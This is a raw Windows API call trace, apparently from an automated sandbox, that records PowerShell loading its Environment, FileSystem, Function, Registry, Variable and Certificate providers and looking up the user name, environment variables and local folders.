	[0203.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.980] CoTaskMemAlloc (cb=0x804) returned 0x1b8700e0
	[0203.980] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8700e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0203.981] CoTaskMemFree (pv=0x1b8700e0) 
	[0203.981] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.981] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0203.983] CoTaskMemFree (pv=0x288f70) 
	[0203.983] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e66e80*="Environment", lpRawData=0x2e66c10) returned 1
	[0203.993] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0203.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.994] CoTaskMemFree (pv=0x27d0e0) 
	[0203.994] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0203.994] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0203.995] CoTaskMemFree (pv=0x27d0e0) 
	[0203.995] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0203.995] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0203.995] CoTaskMemFree (pv=0x27d0e0) 
	[0203.995] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xdd440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0203.995] SetErrorMode (uMode=0x1) returned 0x1
	[0203.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xdd650 | out: lpFileInformation=0xdd650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0203.995] SetErrorMode (uMode=0x1) returned 0x1
	[0204.000] GetLogicalDrives () returned 0x4
	[0204.004] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xdd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.005] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.005] SetErrorMode (uMode=0x1) returned 0x1
	[0204.005] CoTaskMemAlloc (cb=0x68) returned 0x1b851620
	[0204.005] CoTaskMemAlloc (cb=0x68) returned 0x1b851690
	[0204.005] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b851620, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xdd620, lpMaximumComponentLength=0xdd61c, lpFileSystemFlags=0xdd618, lpFileSystemNameBuffer=0x1b851690, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xdd620*=0x705ba84c, lpMaximumComponentLength=0xdd61c*=0xff, lpFileSystemFlags=0xdd618*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0204.006] CoTaskMemFree (pv=0x1b851620) 
	[0204.006] CoTaskMemFree (pv=0x1b851690) 
	[0204.006] SetErrorMode (uMode=0x1) returned 0x1
	[0204.006] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.007] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd360, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.007] SetErrorMode (uMode=0x1) returned 0x1
	[0204.007] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd5c0 | out: lpFileInformation=0xdd5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.007] SetErrorMode (uMode=0x1) returned 0x1
	[0204.007] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd360, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.007] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xdd210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.007] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.008] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.008] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.008] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.009] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd3f0 | out: lpFileInformation=0xdd3f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.009] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.009] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd3f0 | out: lpFileInformation=0xdd3f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.009] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.009] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd490 | out: lpFileInformation=0xdd490*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.009] SetErrorMode (uMode=0x1) returned 0x1
	[0204.010] CoTaskMemAlloc (cb=0x804) returned 0x1b8700e0
	[0204.010] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8700e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0204.016] CoTaskMemFree (pv=0x1b8700e0) 
	[0204.016] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0204.017] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0204.017] CoTaskMemFree (pv=0x288f70) 
	[0204.017] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e6ded8*="FileSystem", lpRawData=0x2e6dc68) returned 1
	[0204.030] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0204.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.030] CoTaskMemFree (pv=0x27d0e0) 
	[0204.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.034] CoTaskMemAlloc (cb=0x804) returned 0x1b8700e0
	[0204.034] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8700e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0204.034] CoTaskMemFree (pv=0x1b8700e0) 
	[0204.034] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0204.034] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0204.035] CoTaskMemFree (pv=0x288f70) 
	[0204.037] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e736c8*="Function", lpRawData=0x2e73458) returned 1
	[0204.045] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0204.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.046] CoTaskMemFree (pv=0x27d0e0) 
	[0210.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.605] CoTaskMemAlloc (cb=0x804) returned 0x1b8710e0
	[0211.605] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8710e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0211.606] CoTaskMemFree (pv=0x1b8710e0) 
	[0211.606] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0211.606] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0211.606] CoTaskMemFree (pv=0x288f70) 
	[0211.607] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea5a50*="Registry", lpRawData=0x2ea57e0) returned 1
	[0211.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.615] CoTaskMemAlloc (cb=0x804) returned 0x1b8710e0
	[0211.615] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8710e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0211.615] CoTaskMemFree (pv=0x1b8710e0) 
	[0211.615] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0211.615] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0211.615] CoTaskMemFree (pv=0x288f70) 
	[0211.616] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eaae18*="Variable", lpRawData=0x2eaaba8) returned 1
	[0211.624] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0211.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.624] CoTaskMemFree (pv=0x27d0e0) 
	[0211.644] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0211.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.645] CoTaskMemFree (pv=0x27d0e0) 
	[0211.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.476] CoTaskMemAlloc (cb=0x804) returned 0x1b8710e0
	[0218.476] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8710e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0218.476] CoTaskMemFree (pv=0x1b8710e0) 
	[0218.476] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0218.476] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0218.476] CoTaskMemFree (pv=0x288f70) 
	[0218.477] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ebe9e0*="Certificate", lpRawData=0x2ebe770) returned 1
	[0218.835] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0218.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.835] CoTaskMemFree (pv=0x27d0e0) 
	[0218.838] GetLogicalDrives () returned 0x4
	[0218.838] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xdd520, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.838] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.839] CoTaskMemAlloc (cb=0x20e) returned 0x1b852b60
	[0218.839] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b852b60 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0218.839] CoTaskMemFree (pv=0x1b852b60) 
	[0218.840] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0218.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.841] CoTaskMemFree (pv=0x27d0e0) 
	[0218.841] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0218.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.841] CoTaskMemFree (pv=0x27d0e0) 
	[0218.859] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0218.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.866] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0218.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.869] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.869] SetErrorMode (uMode=0x1) returned 0x1
	[0218.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xdd4e0 | out: lpFileInformation=0xdd4e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.869] SetErrorMode (uMode=0x1) returned 0x1
	[0219.325] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.325] SetErrorMode (uMode=0x1) returned 0x1
	[0219.325] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0xdd4e0 | out: lpFileInformation=0xdd4e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.325] SetErrorMode (uMode=0x1) returned 0x1
	[0219.327] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0219.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.343] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xdd420, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.346] SetErrorMode (uMode=0x1) returned 0x1
	[0219.346] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.346] SetErrorMode (uMode=0x1) returned 0x1
	[0219.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.346] SetErrorMode (uMode=0x1) returned 0x1
	[0219.346] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.346] SetErrorMode (uMode=0x1) returned 0x1
	[0219.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xdd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.346] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xdd190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.347] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.347] SetErrorMode (uMode=0x1) returned 0x1
	[0219.347] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.347] SetErrorMode (uMode=0x1) returned 0x1
	[0219.347] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xdd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.347] SetErrorMode (uMode=0x1) returned 0x1
	[0219.347] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xdd4a0 | out: lpFileInformation=0xdd4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.347] SetErrorMode (uMode=0x1) returned 0x1
	[0219.347] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xdd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.347] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xdd190, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
